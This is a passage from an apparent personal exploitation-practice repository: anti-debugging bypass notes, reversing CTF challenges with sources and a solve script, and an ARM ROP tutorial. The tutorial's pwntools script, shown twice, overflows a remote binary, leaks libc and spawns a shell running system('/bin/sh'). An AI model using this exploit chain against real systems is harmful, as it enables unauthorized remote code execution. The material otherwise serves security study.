되어 잇다. ) 12 | ``` 13 | void __attribute__((constructor)) detection(void){ 14 | if( ptrace(PTRACE_TRACEME, 0, 1, 0) == -1 ){ 15 | printf("Debugging Detect\n"); 16 | exit(-1); 17 | } 18 | } 19 | ``` 20 | - ptrace가 정상적으로 실행되었으면, return 값으로는 0이 반환되는데, 디버거가 붙어있게되면 -1이 리턴되어서 exit을 통해 탈출하게 된다. 21 | - 소스코드를 보고 분석을 하였을 시에는, 이렇게 쉽게 찾아낼 수 있지만, gcc의 __attribute__((constructor)) 확장 속성을 이용하게되면, 위의 함수는 main()함수 이전에 실행되게 된다. 22 | - .init_array라는 영역에 들어가게되어, main이전에 __libc_start_main()이라는 함수에서 실행해주게 된다. 23 | ``` 24 | [19] .init_array INIT_ARRAY 0000000000600e08 00000e08 25 | 0000000000000010 0000000000000000 WA 0 0 8 26 | 27 | ``` 28 | - gdb에서 분석을 하게되면 이와 같다. 29 | ``` 30 | gef➤ x/gx 0x0000000000600e08 31 | 0x600e08: 0x0000000000400660 32 | gef➤ 33 | 0x600e10: 0x0000000000400686 34 | gef➤ 35 | 0x600e18: 0x0000000000400640 36 | ``` 37 | - 하나하나 주소를 x/i라는 명령을 통해서 instruction을 분석해보게되면, 38 | ``` 39 | gef➤ x/40i 0x400686 40 | 0x400686 : push rbp 41 | 0x400687 : mov rbp,rsp 42 | 0x40068a : mov ecx,0x0 43 | 0x40068f : mov edx,0x1 44 | 0x400694 : mov esi,0x0 45 | 0x400699 : mov edi,0x0 46 | 0x40069e : mov eax,0x0 47 | 0x4006a3 : call 0x400560 48 | 0x4006a8 : cmp rax,0xffffffffffffffff 49 | 0x4006ac : jne 0x4006c2 50 | 0x4006ae : mov edi,0x400888 51 | 0x4006b3 : call 0x400520 52 | 0x4006b8 : mov edi,0xffffffff 53 | 0x4006bd : call 0x400570 54 | 0x4006c2 : nop 55 | 0x4006c3 : pop rbp 56 | 0x4006c4 : ret 57 | ``` 58 | - 0x400686을 분석하게되면 위와같은 결과를 얻을 수 있다. 59 | I can't type korean anymore T_T... Some github errors exist... 60 | - It call ptrace() function in this address, and check whether return value is -1 or not. 61 | - So, to solve this challenge with `GDB`, i set first breakpoint in 0x4006a3 ( ptrace() ) : `b *0x4006a3` 62 | ``` 63 | → 0x4006a3 call 0x400560 64 | ↳ 0x400560 jmp QWORD PTR [rip+0x200ada] # 0x601040 65 | 0x400566 push 0x5 66 | 0x40056b jmp 0x400500 67 | 0x400570 jmp QWORD PTR [rip+0x200ad2] # 0x601048 68 | 0x400576 push 0x6 69 | 0x40057b jmp 0x400500 70 | ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]──── 71 | [#0] Id 1, Name: "challenge2", stopped, reason: BREAKPOINT 72 | ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]──── 73 | [#0] 0x4006a3 → Name: detection() 74 | [#1] 0x40084d → Name: __libc_csu_init() 75 | [#2] 0x7ffff7a2d7bf → Name: __libc_start_main(main=0x4007b2
, argc=0x1, argv=0x7fffffffe5a8, init=0x400800 <__libc_csu_init>, fini=, rtld_fini=, stack_end=0x7fffffffe598) 76 | [#3] 0x4005b9 → Name: _start() 77 | ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 78 | gef➤ 79 | ``` 80 | - `n` is next-step command in `gdb`, so enter the `n`, i get return value in `rax` register. 81 | ``` 82 | $rax : 0xffffffffffffffff 83 | ``` 84 | - And change the return value to 0 to bypass next `cmp` instruction : `set $rax=0` 85 | - ! Now we bypass the `anti-debugging` routine. 86 | - Next step is bypass `strncmp` function in `verify` 87 | ``` 88 | exploit-peda$ pd verify 89 | Dump of assembler code for function verify: 90 | 0x00000000004006c5 <+0>: push rbp 91 | 0x00000000004006c6 <+1>: mov rbp,rsp 92 | 0x00000000004006c9 <+4>: sub rsp,0x20 93 | 0x00000000004006cd <+8>: mov QWORD PTR [rbp-0x18],rdi 94 | 0x00000000004006d1 <+12>: mov edi,0x4008a0 95 | 0x00000000004006d6 <+17>: call 0x400520 96 | 0x00000000004006db <+22>: mov rax,QWORD PTR [rbp-0x18] 97 | 0x00000000004006df <+26>: add rax,0x8 98 | 0x00000000004006e3 <+30>: mov rax,QWORD PTR [rax] 99 | 0x00000000004006e6 <+33>: mov edx,0x4 100 | 0x00000000004006eb <+38>: mov rsi,rax 101 | 0x00000000004006ee <+41>: mov edi,0x4008cd 102 | 0x00000000004006f3 <+46>: call 0x400510 103 | ``` 104 | - set `b *0x4006f3` 105 | - and `c` -> continue 106 | - `n` to do `next-step`, change the `rax` register ( return value ) to 0 which means two strings are equal. 107 | ``` 108 | 0x00000000004006f8 in verify () 109 | exploit-peda$ set $rax=0 110 | exploit-peda$ c 111 | Continuing. 112 | A3gis_ch4llenge2_c0mplete! 113 | ``` 114 | -------------------------------------------------------------------------------- /aegis/reversing/challenge3/README.md: -------------------------------------------------------------------------------- 1 | # Aegis reversing challenge 2 | 3 | **Challenge 3** 4 | 5 | - Find a flag 6 | - Very Easy Challenge 7 | -------------------------------------------------------------------------------- /aegis/reversing/challenge3/cmp_challenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/reversing/challenge3/cmp_challenge -------------------------------------------------------------------------------- /aegis/reversing/challenge3/solve.py: -------------------------------------------------------------------------------- 1 | temp = "A_B33f_Beef_I_Love_steak_{Ring_my_bell~}Mommy_should_i_get_that_beef~?" 2 | table = '''00 00 00 00 08 00 00 00 1D 00 00 00 1B 00 00 00 3 | 13 00 00 00 19 00 00 00 22 00 00 00 03 00 00 00 4 | 03 00 00 00 05 00 00 00 01 00 00 00 1B 00 00 00 5 | 13 00 00 00 01 00 00 00 1F 00 00 00 20 00 00 00 6 | 01 00 00 00 0E 00 00 00 0F 00 00 00 10 00 00 00 7 | 08 00 00 00 27 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 8 | '''.replace("\n", " ").replace(" ", " ").split(" ") 9 | 10 | idx = [] 11 | 12 | for i in xrange(22): 13 | idx.append(table[i * 4]) 14 | 15 | flag = '' 16 | 17 | # ['00', '08', '1D', '1B', '13', '19', '22', '03', '03', '05', '01', '1B', '13', '01', '1F', '20', '01', '0E', '0F', '10', '08', '27'] 18 | 19 | for i in idx: 20 | flag += temp[int("0x"+i, 0)] 21 | 22 | print "[-] flag is : " + flag 23 | -------------------------------------------------------------------------------- /aegis/reversing/challenge4/README.md: -------------------------------------------------------------------------------- 1 | # Aegis reversing challenge 2 | 3 | **Challenge 4** 4 | 5 | - Find a flag 6 | - You may try some code patch in this binary. ( patch to 0x90 is recommended ) 7 | - It's okay only use GDB, but i want to solve it by code patching and using GDB 8 | -------------------------------------------------------------------------------- /aegis/reversing/challenge4/challenge4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/reversing/challenge4/challenge4 -------------------------------------------------------------------------------- /aegis/reversing/challenge5/README.md: -------------------------------------------------------------------------------- 1 | # Aegis reversing challenge 2 | **challenge 5** 3 | - police ! 4 | - code patch ! 5 | - rand ?! 6 | -------------------------------------------------------------------------------- /aegis/reversing/challenge5/police: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/reversing/challenge5/police -------------------------------------------------------------------------------- /aegis/reversing/challenge5/police.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | int check = 0; 10 | int user_check = 0; 11 | int final[28]; 12 | char not_flag[] = {'A', 'e', 'g', 'i', 's', '{', 'c', 'r', 'a', 'c', 'k', '_', 'm', 'e', '_', 'c', 'h', 'a', 'l', 'l', 'e', 'n', 'g', 'e', '_', 'c', 'r', 'a', 'c', 'k', '_', 'm', 'e', '~', '}'}; 13 | char key[35] = {0, 0, 0, 0, 0, 0, -20, -71, -22, -1, -4, -1, -30, -82, -44, -1, -1, -63, -96, -14, -23, -24, -57, -22, -109, -17, -12, -92, -75, -22, -52, -13, -10, -32, 0}; 14 | int valid = 0; 15 | int seq = 6; 16 | 17 | void validation(int _check, int c){ 18 | if( _check == check ){ 19 | key[seq] = ~key[seq]; 20 | seq++; 21 | if( seq == 34 ) 22 | valid = 1; 23 | } 24 | if( c == 27 ){ 25 | printf("[-] Wrong\n"); 26 | exit(0); 27 | } 28 | } 29 | 30 | void *pthread_police(void *args){ 31 | if( ptrace(PTRACE_TRACEME, 0, 0, 0) == -1 ){ 32 | printf("Debugging Detect\n"); 33 | exit(-1); 34 | } 35 | } 36 | 37 | void *pthread_lover(void *args){ 38 | for(int i = 0; i < 28; i++ ){ 39 | printf("Input [trial : %d] : ", i); 40 | scanf("%d", &user_check); 41 | validation(user_check, i); 42 | } 43 | } 44 | 45 | void *pthread_checker(void *args){ 46 | while(1){ 47 | if( valid ){ 48 | printf("Congrat!\n"); 49 | for(int i = 0; i < 35; i++){ 50 | printf("%c", not_flag[i] ^ key[i]); 51 | } 52 | puts(""); 53 | exit(0); 54 | } 55 | check = 0; 56 | sleep(1); 57 | } 58 | } 59 | 60 | void *pthread_loop(void *args){ 61 | pthread_t police[0x10]; 62 | for(int i = 0; i < 0x10; i++){ 63 | pthread_create( &police[i], 0, (void *)&pthread_police, 0 ); 64 | pthread_join( police[i], 0 ); 65 | } 66 | } 67 | 68 | void *pthread_shuffler(void *args){ 69 | while(1){ 70 | for( int i = 0; i < 28; i++ ) 71 | final[i] = rand() % 0x4000; 72 | sleep(0.3); 73 | } 74 | } 75 | 76 | int main(int argc, char *argv[]){ 77 | int fd = open("/dev/urandom", O_RDONLY); 78 | unsigned int secret; 79 | read(fd, &check, 4); 80 | srand(check); 81 | for( int i = 0; i < 28; i++ ) 82 | final[i] = rand() % 0x4000; 83 | setvbuf(stdout, 0, 2, 0); 84 | setvbuf(stdin, 0, 2, 0); 85 | setvbuf(stderr, 0, 2, 0); 86 | printf("Aegis Crackme Challenge\n"); 87 | pthread_t lover, checker, shuffler; 88 | pthread_create( &lover, 0, (void *)&pthread_lover, 0 ); 89 | pthread_create( &checker, 0, (void *)&pthread_checker, 0 ); 90 | pthread_create( &shuffler, 0, (void *)&pthread_shuffler, 0 ); 91 | pthread_join( lover, 0 ); 92 | pthread_join( checker, 0 ); 93 | pthread_join( shuffler, 0 ); 94 | return 0; 95 | } 96 | 97 | void __attribute__((constructor)) __printf(void){ 98 | pthread_t loop; 99 | pthread_create( &loop, 0, (void *)&pthread_loop, 0 ); 100 | } 101 | -------------------------------------------------------------------------------- /aegis/v8/README.md: -------------------------------------------------------------------------------- 1 | # Google V8 JavaScript Engine Analysis 2 | **Handle** 3 | 4 | ``` 5 | template 6 | class Handle final : public HandleBase { 7 | public: 8 | V8_INLINE explicit Handle(T** location = nullptr) 9 | : HandleBase(reinterpret_cast(location)) { 10 | // Type check: 11 | static_assert(std::is_convertible::value, 12 | "static type violation"); 13 | } 14 | ``` 15 | 16 | - final -> can't be inherited class 17 | -------------------------------------------------------------------------------- /aegis/work1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define MAXNUM 0x40 8 | #define prefix_student 0 9 | #define prefix_course 1 10 | #define prefix_course_taken 2 11 | 12 | char *prefix[3] = {"_student.dat", "_course.dat", "_courseTaken.dat"}; 13 | char *grade_lists[9] = {"A+", "A-", "B+", "B-", "C+" ,"C-", "D+", "D-", "Fail"}; 14 | 15 | typedef struct{ 16 | unsigned int stdID; 17 | char studentName[0x30]; 18 | char studentMajor[0x30]; 19 | }student; 20 | 21 | typedef struct{ 22 | unsigned int courseID; 23 | char courseName[0x30]; 24 | }course; 25 | 26 | typedef struct{ 27 | unsigned int No; 28 | unsigned int studentID; 29 | unsigned int courseID; 30 | char grade[4]; 31 | }course_taken; 32 | 33 | student *std_array[MAXNUM]; 34 | course *std_course[MAXNUM]; 35 | course_taken *std_course_taken[MAXNUM]; 36 | 37 | int quit = 0; 38 | 39 | int intro(void){ 40 | int user_input = 0; 41 | puts("\n[+] asiagaming's mysql database\n"); 42 | puts("1. create table"); 43 | puts("2. insert table"); 44 | puts("3. show tables"); 45 | puts("4. show table's datas"); 46 | puts("5. binary IO"); 47 | puts("6. quit"); 48 | printf("\n> "); 49 | scanf("%d", &user_input); 50 | return user_input; 51 | } 52 | 53 | void show_insert_menu(void){ 54 | puts("\n1. student"); 55 | puts("2. course"); 56 | puts("3. course_taken"); 57 | printf("\n> "); 58 | } 59 | 60 | void create(void); 61 | void insert(void); 62 | void insert_to_student(void); 63 | void insert_to_course(void); 64 | int insert_to_course_taken(void); 65 | void show_tables(void); 66 | void show_table_datas(void); 67 | void binary_IO(void); 68 | void binary_open(void); 69 | void binary_save(void); 70 | void save_student(char *_nameset, FILE *_fp); 71 | void save_course(char *_nameset, FILE *_fp); 72 | void save_course_taken(char *_nameset, FILE *fp); 73 | 74 | int main(int argc, char *argv[]){ 75 | setvbuf(stdin, 0, 2, 0); 76 | setvbuf(stdout, 0, 2, 0); 77 | setvbuf(stderr, 0, 2, 0); 78 | while(quit != 6){ 79 | quit = intro(); 80 | switch(quit){ 81 | case 1: 82 | create(); 83 | break; 84 | case 2: 85 | insert(); 86 | break; 87 | case 3: 88 | show_tables(); 89 | break; 90 | case 4: 91 | show_table_datas(); 92 | break; 93 | case 5: 94 | binary_IO(); 95 | break; 96 | case 6: 97 | break; 98 | default: 99 | puts("[-] Wrong."); 100 | break; 101 | } 102 | } 103 | return 0; 104 | } 105 | 106 | void create(void){ 107 | puts("[+] create"); 108 | puts("[-] No meaning in this task..."); 109 | } 110 | void insert(void){ 111 | puts("[+] insert"); 112 | show_insert_menu(); 113 | int iCase = 0; 114 | scanf("%d", &iCase); 115 | switch(iCase){ 116 | case 1: 117 | insert_to_student(); 118 | break; 119 | case 2: 120 | insert_to_course(); 121 | break; 122 | case 3: 123 | insert_to_course_taken(); 124 | break; 125 | default: 126 | puts("[-] Wrong"); 127 | break; 128 | } 129 | } 130 | 131 | /* 132 | 9 typedef struct{ 133 | 10 unsigned int stdID; 134 | 11 char studentName[0x30]; 135 | 12 char studentMajor[0x30]; 136 | 13 }student; 137 | */ 138 | 139 | void insert_to_student(void){ 140 | puts("[+] insert_to_student"); 141 | int index = 0; 142 | for( index = 0; index < 0x40; index++ ){ 143 | if( !std_array[index] ){ 144 | std_array[index] = (student *)malloc(sizeof(student)); 145 | break; 146 | } 147 | } 148 | printf("student ID : "); 149 | scanf("%u", &std_array[index]->stdID); 150 | printf("student name : "); 151 | scanf("%47s", std_array[index]->studentName); 152 | printf("student major : "); 153 | scanf("%47s", std_array[index]->studentMajor); 154 | } 155 | 156 | /* 157 | 15 typedef struct{ 158 | 16 unsigned int courseID; 159 | 17 char courseName[0x30]; 160 | 18 }course; 161 | 19 162 | 20 typedef struct{ 163 | 21 unsigned int No; 164 | 22 unsigned int studentID; 165 | 23 unsigned int courseID; 166 | 24 char grade[4]; 167 | 25 }course_taken; 168 | */ 169 | 170 | void insert_to_course(void){ 171 | puts("[+] insert_to_course"); 172 | int index = 0; 173 | for( index = 0; index < 0x40; index++ ){ 174 | if( !std_course[index] ){ 175 | std_course[index] = (course *)malloc(sizeof(course)); 176 | break; 177 | } 178 | } 179 | printf("course ID : "); 180 | scanf("%u", &std_course[index]->courseID); 181 | printf("course name : "); 182 | scanf("%47s", std_course[index]->courseName); 183 | } 184 | 185 | int insert_to_course_taken(void){ 186 | puts("[+] insert_to_course_taken"); 187 | int index = 0; 188 | int check = 0; 189 | for( index = 0; index < MAXNUM; index++ ){ 190 | if( !std_course_taken[index] ){ 191 | std_course_taken[index] = (course_taken *)malloc(sizeof(course_taken)); 192 | break; 193 | } 194 | } 195 | std_course_taken[index]->No = (unsigned int)index; 196 | printf("student id : "); 197 | scanf("%u", &std_course_taken[index]->studentID); 198 | for(int i = 0; i < MAXNUM; i++ ){ 199 | if( std_array[i] && std_course_taken[index]->studentID == std_array[i]->stdID ){ 200 | check = 1; 201 | break; 202 | } 203 | } 204 | if( !check ){ 205 | printf("[-] No matched studentID\n"); 206 | std_course_taken[index] = 0; // initalize to 0 207 | return -1; 208 | } 209 | printf("course id : "); 210 | scanf("%u", &std_course_taken[index]->courseID); 211 | check = 0; 212 | for(int i = 0; i < MAXNUM; i++ ){ 213 | if( std_course[i] && std_course_taken[index]->courseID == std_course[i]->courseID ){ 214 | check = 1; 215 | break; 216 | } 217 | } 218 | if( !check ){ 219 | printf("[-] No matched courseID\n"); 220 | std_course_taken[index] = 0; // initalize to 0 221 | return -1; 222 | } 223 | printf("grade [A+, A-, ... , Fail] : "); 224 | scanf("%3s", std_course_taken[index]->grade); 225 | for( int i = 0; i < 9; i++ ){ 226 | if( !strcmp( grade_lists[i], std_course_taken[index]->grade ) ){ 227 | break; 228 | } 229 | if( i == 8 ){ 230 | puts("[-] Invalid grade"); 231 | std_course_taken[index] = 0; // initalize to 0 232 | return -1; 233 | } 234 | } 235 | return 0; 236 | } 237 | 238 | void show_tables(void){ 239 | puts("[+] show_tables"); 240 | } 241 | void show_table_datas(void){ 242 | puts("[+] show_table_datas"); 243 | } 244 | void binary_IO(void){ 245 | puts("[+] binary IO"); 246 | printf("\n1. binary open -> read\n"); 247 | printf("\n2. binary save\n"); 248 | int bCase = 0; 249 | scanf("%d", &bCase); 250 | switch(bCase){ 251 | case 1: 252 | binary_open(); 253 | break; 254 | case 2: 255 | binary_save(); 256 | break; 257 | default: 258 | puts("[-] Wrong"); 259 | break; 260 | } 261 | } 262 | 263 | void binary_open(void){ 264 | puts("[+] binary open -> read"); 265 | } 266 | 267 | void save_file(int num){ 268 | FILE *fp = 0; 269 | char name_set[0x30] = {0, }; 270 | printf("name initial : "); 271 | scanf("%10s", name_set); 272 | strcat(name_set, prefix[num - 1]); 273 | fp = fopen(name_set, "wb"); 274 | 275 | switch(num - 1){ 276 | case prefix_student: 277 | save_student(name_set, fp); 278 | break; 279 | case prefix_course: 280 | save_course(name_set, fp); 281 | break; 282 | case prefix_course_taken: 283 | save_course_taken(name_set, fp); 284 | break; 285 | default: 286 | puts("[-] Wrong"); 287 | break; 288 | } 289 | } 290 | 291 | void binary_save(void){ 292 | int fCase = 0; 293 | puts("[+] binary save"); 294 | printf("\n1. student file\n2. course file\n3. course_taken file\n\n> "); 295 | scanf("%d", &fCase); 296 | save_file(fCase); 297 | } 298 | 299 | /* 300 | typedef struct{ 301 | unsigned int stdID; 302 | char studentName[0x30]; 303 | char studentMajor[0x30]; 304 | }student; 305 | */ 306 | 307 | void save_student(char *_nameset, FILE *_fp){ 308 | int index = 0; 309 | char id[0x10] = {0, }; 310 | for( index; index < MAXNUM; index++ ){ 311 | if( std_array[index] ){ 312 | sprintf(id, "%u\n", std_array[index]->stdID); 313 | fwrite(id, strlen(id), 1, _fp); 314 | fwrite(std_array[index]->studentName, strlen(std_array[index]->studentName), 1, _fp); 315 | fwrite("\n\n", 1, 1, _fp); 316 | fwrite(std_array[index]->studentMajor, strlen(std_array[index]->studentMajor), 1, _fp); 317 | } 318 | } 319 | fclose(_fp); 320 | } 321 | 322 | void save_course(char *_nameset, FILE *_fp){ 323 | int index = 0; 324 | char id[0x10] = {0, }; 325 | for( index; index < MAXNUM; index++ ){ 326 | if( std_course[index] ){ 327 | sprintf(id, "%u\n", std_course[index]->courseID); 328 | fwrite(id, strlen(id), 1, _fp); 329 | fwrite(std_course[index]->courseName, strlen(std_course[index]->courseName), 1, _fp); 330 | } 331 | } 332 | fclose(_fp); 333 | } 334 | 335 | /* 336 | typedef struct{ 337 | unsigned int No; 338 | unsigned int studentID; 339 | unsigned int courseID; 340 | char grade[4]; 341 | }course_taken; 342 | */ 343 | 344 | void save_course_taken(char *_nameset, FILE *_fp){ 345 | int index = 0; 346 | char id[0x10] = {0, }; 347 | for( index; index < MAXNUM; index++ ){ 348 | if( std_course_taken[index] ){ 349 | sprintf(id, "%u\n", std_course_taken[index]->No); 350 | fwrite(id, strlen(id), 1, _fp); 351 | sprintf(id, "%u\n", std_course_taken[index]->studentID); 352 | fwrite(id, strlen(id), 1, _fp); 353 | sprintf(id, "%u\n", std_course_taken[index]->courseID); 354 | fwrite(id, strlen(id), 1, _fp); 355 | fwrite(std_course_taken[index]->grade, 4, 1, _fp); 356 | } 357 | } 358 | fclose(_fp); 359 | } 360 | -------------------------------------------------------------------------------- /arm/basic_rop.md: -------------------------------------------------------------------------------- 1 | # Basic ROP example 2 | 3 | **Description** 4 | 5 | - Simple Buffer Overflow Vulnerabiltiy 6 | - Running on Raspberry Pi 3 ARM Board with daemon 7 | - No Canary, NX-bit on, ASLR on, No PIE, No Relro 8 | 9 | **source** 10 | 11 | ``` 12 | #include  13 | #include  14 | #include  15 |   16 | int main(){ 17 |     setvbuf(stdin, 0, 2, 0); 18 |     setvbuf(stdout, 0, 2, 0); 19 |     setvbuf(stderr, 0, 2, 0); 20 |     char buf[256]; 21 |     printf("Hello, World!\n"); 22 |     read(0, buf, 0x256); 23 |     return 0; 24 | } 25 | ``` 26 | 27 | **Exploit code** 28 | 29 | ``` 30 | from pwn import * 31 | import time, sys 32 | 33 | context.binary = "./vuln" 34 | binary = ELF("./vuln") 35 | p = remote("192.168.0.6", "2323") 36 | prog = log.progress("Remote ARM Exploitation") 37 | ''' 38 | 0x000105e8: pop {r3, r4, r5, r6, r7, r8, sb, pc}; 39 | 0x000105d0: mov r0, r7; mov r1, r8; mov r2, sb; blx r3; 40 | 0x000104e0: blx r3; 41 | 0x105e8 <__libc_csu_init+88> pop {r3, r4, r5, r6, r7, r8, r9, pc} 42 | ''' 43 | puts = 0x1045c 44 | main_puts = 0x00010554 45 | offset = 0x61478 46 | main = 0x000104f0 47 | got = 0x00020714 48 | 49 | exp = "A" * 0x100 + p32(got + 260) 50 | exp += p32(0x105e8) + p32(binary.plt["puts"]) + p32(0) * 3 51 | exp += p32(binary.got["puts"]) + p32(0) * 2 52 | exp += p32(0x105d0) 53 | exp += p32(main) + p32(0) * 6 + p32(0x105d0) 54 | 55 | p.sendline(exp) 56 | p.recvuntil("!\n") 57 | libc_base = u32(p.recv(4)) - offset 58 | system = libc_base + 0x39fac 59 | binsh = libc_base + 0x11db20 60 | log.info("libc_base : " + hex(libc_base)) 61 | log.info("system : " + hex(system)) 62 | 63 | exp2 = p32(0x105e8) + p32(system) + p32(0) * 3 + p32(binsh) + p32(0) * 2 + p32(0x105d0) 64 | p.sendline("C" * 0x100 + "B" * 4 + exp2) 65 | 66 | p.interactive() 67 | ``` 68 | 69 | **result** 70 | 71 | ``` 72 | root@ubuntu:/mnt/hgfs/shared/arm# python simple.py 73 | [*] '/mnt/hgfs/shared/arm/test' 74 | Arch: arm-32-little 75 | RELRO: No RELRO 76 | Stack: No canary found 77 | NX: NX enabled 78 | PIE: No PIE (0x10000) 79 | [+] Opening connection to 192.168.0.6 on port 2323: Done 80 | [<] Remote ARM Exploitation 81 | [*] libc_base : 0x76d68000 82 | [*] system : 0x76da1fac 83 | [*] Switching to interactive mode 84 | \x80�vl\x03 85 | Hello, World! 86 | $ id 87 | uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi) 88 | $ cat flag 89 | ARM{y0u_g07_4_s1mple_4rm_3xp10i7at10n} 90 | $ 91 | [*] Closed connection to 192.168.0.6 port 2323 92 | ``` 93 | -------------------------------------------------------------------------------- /arm/simple.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time, sys 3 | 4 | context.binary = "./vuln" 5 | binary = ELF("./vuln") 6 | p = remote("192.168.0.6", "2323") 7 | prog = log.progress("Remote ARM Exploitation") 8 | ''' 9 | 0x000105e8: pop {r3, r4, r5, r6, r7, r8, sb, pc}; 10 | 0x000105d0: mov r0, r7; mov r1, r8; mov r2, sb; blx r3; 11 | 0x000104e0: blx r3; 12 | 0x105e8 <__libc_csu_init+88> pop {r3, r4, r5, r6, r7, r8, r9, pc} 13 | ''' 14 | puts = 0x1045c 15 | main_puts = 0x00010554 16 | offset = 0x61478 17 | main = 0x000104f0 18 | got = 0x00020714 19 | 20 | exp = "A" * 0x100 + p32(got + 260) 21 | exp += p32(0x105e8) + p32(binary.plt["puts"]) + p32(0) * 3 22 | exp += p32(binary.got["puts"]) + p32(0) * 2 23 | exp += p32(0x105d0) # blx -> x86 call instruction... but why cant re-execute main? 24 | exp += p32(main) + p32(0) * 6 + p32(0x105d0) 25 | 26 | fp = open("payload", "w") 27 | fp.write(exp) 28 | fp.close() 29 | 30 | p.sendline(exp) 31 | p.recvuntil("!\n") 32 | libc_base = u32(p.recv(4)) - offset 33 | system = libc_base + 0x39fac 34 | binsh = libc_base + 0x11db20 35 | log.info("libc_base : " + hex(libc_base)) 36 | log.info("system : " + hex(system)) 37 | 38 | exp2 = p32(0x105e8) + p32(system) + p32(0) * 3 + p32(binsh) + p32(0) * 2 + p32(0x105d0) 39 | p.sendline("C" * 0x100 + "B" * 4 + exp2) 40 | 41 | p.interactive() 42 | -------------------------------------------------------------------------------- /arm/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/arm/vuln -------------------------------------------------------------------------------- /clang/README.md: -------------------------------------------------------------------------------- 1 | # c/c++ 2 | 3 | **Extra code files** 4 | -------------------------------------------------------------------------------- /clang/const_vector.cc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | class Functer{ 6 | public: 7 | void operator()(){ 8 | std::cout << "ASFASDFASDF" << std::endl; 9 | } 10 | }; 11 | 12 | class Point{ 13 | public: 14 | void pConst() const; 15 | int v1; 16 | int v2; 17 | private: 18 | int x, y; 19 | }; 20 | 21 | /* Declare that this is read-only object */ 22 | 23 | void Point::pConst() const{ 24 | //this->x = 5; 25 | //this->y = 6; 26 | //this->v1 = 6; 27 | //this->v2 = 6; 28 | std::cout << "Point" << std::endl; 29 | } 30 | 31 | int main(int argc, char *argv[]){ 32 | Functer func; 33 | func(); 34 | std::vector v1(1); 35 | std::vector v2(5, 7); 36 | std::cout << v1[0] << std::endl; 37 | for( int i = 0; i < 5; i++ ){ 38 | std::cout << v2[i] << std::endl; 39 | } 40 | return 0; 41 | } 42 | -------------------------------------------------------------------------------- /clang/gogole_gen_tags.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright 2017 the V8 project authors. All rights reserved. 3 | # Use of this source code is governed by a BSD-style license that can be 4 | # found in the LICENSE file. 5 | """\ 6 | Convenience script for generating arch-specific ctags file. 7 | This script MUST be executed at the top directory. 8 | 9 | Usage: 10 | $ tools/dev/gen-tags.py [...] 11 | 12 | The example usage is as follows: 13 | $ tools/dev/gen-tags.py x64 14 | 15 | If no is given, it generates tags file for all arches: 16 | $ tools/dev/gen-tags.py 17 | """ 18 | import os 19 | import subprocess 20 | import sys 21 | 22 | # All arches that this script understands. 23 | ARCHES = ["ia32", "x64", "arm", "arm64", "mips", "mips64", "ppc", "s390"] 24 | 25 | def PrintHelpAndExit(): 26 | print(__doc__) 27 | sys.exit(0) 28 | 29 | 30 | def _Call(cmd, silent=False): 31 | if not silent: print("# %s" % cmd) 32 | return subprocess.call(cmd, shell=True) 33 | 34 | 35 | def ParseArguments(argv): 36 | if not "tools/dev" in argv[0]: 37 | PrintHelpAndExit() 38 | argv = argv[1:] 39 | 40 | # If no argument is given, then generate ctags for all arches. 41 | if len(argv) == 0: 42 | return ARCHES 43 | 44 | user_arches = [] 45 | for argstring in argv: 46 | if argstring in ("-h", "--help", "help"): 47 | PrintHelpAndExit() 48 | if argstring not in ARCHES: 49 | print("Invalid argument: %s" % argstring) 50 | sys.exit(1) 51 | user_arches.append(argstring) 52 | 53 | return user_arches 54 | 55 | 56 | def Exclude(fullpath, exclude_arches): 57 | for arch in exclude_arches: 58 | if ("/%s/" % arch) in fullpath: return True 59 | return False 60 | 61 | 62 | def Main(argv): 63 | user_arches = [] 64 | 65 | user_arches = ParseArguments(argv) 66 | 67 | exclude_arches = list(ARCHES) 68 | for user_arch in user_arches: 69 | exclude_arches.remove(user_arch) 70 | 71 | paths = ["include", "src", "test"] 72 | exts = [".h", ".cc", ".c"] 73 | 74 | gtags_filename = "gtags.files" 75 | 76 | with open(gtags_filename, "w") as gtags: 77 | for path in paths: 78 | for root, dirs, files in os.walk(path): 79 | for file in files: 80 | if not file.endswith(tuple(exts)): continue 81 | fullpath = os.path.join(root, file) 82 | if Exclude(fullpath, exclude_arches): continue 83 | gtags.write(fullpath + os.linesep) 84 | 85 | _Call("ctags --fields=+l -L " + gtags_filename) 86 | 87 | 88 | if __name__ == "__main__": 89 | sys.exit(Main(sys.argv)) 90 | -------------------------------------------------------------------------------- /clang/io_multiplexing.md: -------------------------------------------------------------------------------- 1 | # Kernel Input/Output Multiplexing 2 | **What is it?** 3 | ... 4 | -------------------------------------------------------------------------------- /clang/mmap_madvise.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int main(int argc, char *argv[]){ 8 | int ret = open("./a.out", O_RDONLY); 9 | if( ret < 0 ){ 10 | perror("open"); 11 | exit(-1); 12 | } 13 | 14 | void *mmap_res = mmap(0, 0x1000, PROT_READ, MAP_PRIVATE, ret, 0); 15 | printf("%lx\n", mmap_res); 16 | 17 | madvise( mmap_res, 0x1000, 4); 18 | // int madvise(void *addr, size_t length, int advice); 19 